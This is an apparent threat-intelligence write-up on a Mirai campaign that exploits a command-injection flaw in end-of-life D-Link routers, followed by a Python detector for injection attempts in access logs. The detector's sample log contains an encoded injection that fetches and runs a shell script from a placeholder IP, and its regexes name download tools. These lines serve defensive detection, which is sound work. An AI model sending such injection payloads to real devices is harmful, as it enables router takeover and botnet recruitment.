New Mirai Campaign Exploits EoL D-Link Routers

Overview

Akamai’s Security Intelligence Response Team (SIRT) has detected a new Mirai-based malware campaign exploiting CVE‑2025‑29635, a command-injection flaw in the web management interface of D-Link DIR‑823X routers. The vulnerability, first disclosed in early 2025, lets attackers execute arbitrary commands on the device via crafted POST requests. Although the routers reached end of life (EoL) in November 2024, attackers are now actively weaponizing the flaw to conscript the remaining devices into Mirai botnets.

Key Highlights

  • Vulnerability: CVE‑2025‑29635, command injection via the /goform/set_prohibiting endpoint of the router’s web interface.
  • Impact: Remote command execution (RCE) on the router, enabling malware installation.
  • Observed Exploitation: The injected command makes the router fetch and run a shell script (dlink.sh), which installs the Mirai variant tuxnokill.
  • Capabilities: Standard Mirai DDoS attacks — TCP SYN/ACK/STOMP floods, UDP floods, HTTP null floods.
  • Cross-Vendor Exploitation: The same actor also targets TP-Link Archer AX21 routers (CVE‑2023‑1389) and ZTE ZXV10 H108L routers.
  • Patch Status: No fix is expected; the devices are EoL and unsupported.

Attack Flow

  1. Exploit Trigger: A crafted POST request is sent to the vulnerable /goform/set_prohibiting endpoint, injecting shell commands.
  2. Payload Delivery: The injected command makes the router download a shell script (dlink.sh) from an attacker-controlled external IP.
  3. Malware Installation: The script installs the Mirai variant “tuxnokill,” with builds for multiple CPU architectures so the same stager works across router models.
  4. Botnet Integration: The infected router checks in to the botnet and is used in DDoS campaigns.

Risks to Users

  • Botnet Recruitment: Compromised routers are used in large-scale DDoS attacks.
  • Collateral Damage: A compromised router sits in front of every device behind it, exposing home and enterprise networks to secondary compromise.
  • No Vendor Support: EoL status means no official patch will be released, so the flaw stays exploitable for the life of the device.
  • Cross-Device Threat: The same campaign exploits multiple router brands, widening the pool of devices the actor can recruit.

Defensive Guidance

  • Upgrade Hardware: Replace EoL routers with actively supported models; with no patch coming, this is the only complete fix.
  • Disable Remote Admin: Turn off remote management and block WAN-side access to the web management interface unless strictly necessary.
  • Change Default Credentials: Use strong, unique admin passwords.
  • Monitor Configurations and Traffic: Watch for unauthorized configuration changes, unexpected scripts or binaries on the device, and router-initiated downloads from unfamiliar IP addresses.
  • Network Segmentation: Isolate IoT devices and consumer-grade routers from critical systems.
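The attack flow above (POST to the vulnerable endpoint, shell metacharacters in a parameter, then a download-and-execute stager) is easy to hunt for if request bodies are logged at a proxy or syslog collector in front of the management interface. The following detector is an added example and not Akamai’s or D-Link’s code. It assumes a combined-style access log extended with a `body="…"` field; the log lines, the IP addresses (RFC 5737 documentation ranges) and the parameter names `param`, `enable` and `ssid` are constructed for illustration, since the page does not give the real parameter or a second endpoint. It deliberately does not match on the literal filename dlink.sh, which an operator can rename at will, and instead looks for the generic stager shape.

```python
"""Hunt for CVE-2025-29635-style command injection in HTTP access logs.

Added example, not code from the Akamai SIRT report. Assumes a proxy or
router syslog export that records method, path and POST body (most routers
do not log bodies by default; a reverse proxy in front of the admin UI does).
"""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import parse_qsl

# Endpoint named in the advisory for D-Link DIR-823X (CVE-2025-29635).
TARGET_PATHS = {"/goform/set_prohibiting"}

# Shell metacharacters that never belong in a router configuration value.
SHELL_META = re.compile(r"[;|&`\n]|\$\(|\$\{")

# Fetch-then-run shape of a Mirai stager, independent of the script name.
STAGER = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*\b(sh|bash|chmod)\b", re.I)

# Combined log format plus a trailing body="..." field (assumed, see lead-in).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'body="(?P<body>[^"]*)"$'
)

R_ENDPOINT = "known-vulnerable endpoint"
R_META = "shell metacharacters in parameter"
R_STAGER = "download-and-execute stager"


@dataclass
class Finding:
    src: str
    path: str
    reasons: List[str]


def classify_body(path: str, body: str) -> List[str]:
    """Return the list of indicators present in one POST request."""
    reasons = []
    if path in TARGET_PATHS:
        reasons.append(R_ENDPOINT)
    # Decode per parameter: '&' is the form separator, so inspecting the raw
    # body would flag every multi-parameter request.
    values = [v for _, v in parse_qsl(body, keep_blank_values=True)]
    if any(SHELL_META.search(v) for v in values):
        reasons.append(R_META)
    if any(STAGER.search(v) for v in values):
        reasons.append(R_STAGER)
    return reasons


def scan(lines: List[str]) -> List[Finding]:
    """Flag POST requests carrying an injection indicator.

    A request to the vulnerable endpoint alone is normal admin traffic and is
    not flagged; a metacharacter or stager on any endpoint is.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        reasons = classify_body(path, m["body"])
        if any(r != R_ENDPOINT for r in reasons):
            findings.append(Finding(m["src"], path, reasons))
    return findings


# Constructed sample log; parameter names and addresses are placeholders.
SAMPLE_LOG = [
    # Legitimate admin saving a setting on the vulnerable endpoint.
    '192.168.0.10 - - [05/Jun/2025:10:01:02 +0000] '
    '"POST /goform/set_prohibiting HTTP/1.1" 200 512 body="param=1&enable=1"',
    # Injection attempt: ';' then fetch-and-run of a script from a remote IP.
    '203.0.113.7 - - [05/Jun/2025:10:05:44 +0000] '
    '"POST /goform/set_prohibiting HTTP/1.1" 200 512 '
    'body="param=%3Bwget+http%3A%2F%2F198.51.100.9%2Fdlink.sh+-O+%2Ftmp%2Fd.sh'
    '%3Bsh+%2Ftmp%2Fd.sh&enable=1"',
    # Unrelated GET, ignored.
    '192.168.0.10 - - [05/Jun/2025:10:06:00 +0000] '
    '"GET /index.html HTTP/1.1" 200 1024 body=""',
    # Backticks in a value on a different (hypothetical) endpoint.
    '198.51.100.22 - - [05/Jun/2025:10:07:13 +0000] '
    '"POST /goform/set_wifi HTTP/1.1" 200 512 body="ssid=home%60id%60"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.src} -> {f.path}: {', '.join(f.reasons)}")
```

Run it against real logs by feeding `scan()` the lines from your proxy; the second sample triggers all three indicators, the fourth only the metacharacter check. A router-side hit on the vulnerable endpoint should also be correlated with outbound HTTP from the router to a bare IP, which is the other half of the stager and is visible at the firewall even when request bodies are not logged. On a home network, where no such logging exists, the guidance above still applies: the only complete mitigation is replacing the EoL device.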

Final Thought

This campaign highlights the long tail of risk in unsupported devices. Even long after disclosure, and long after vendor support has ended, unpatched routers remain prime targets for botnet operators. For defenders, the lesson is clear: retire EoL hardware, enforce strong configurations, and monitor for signs of compromise to avoid becoming part of the next Mirai wave.
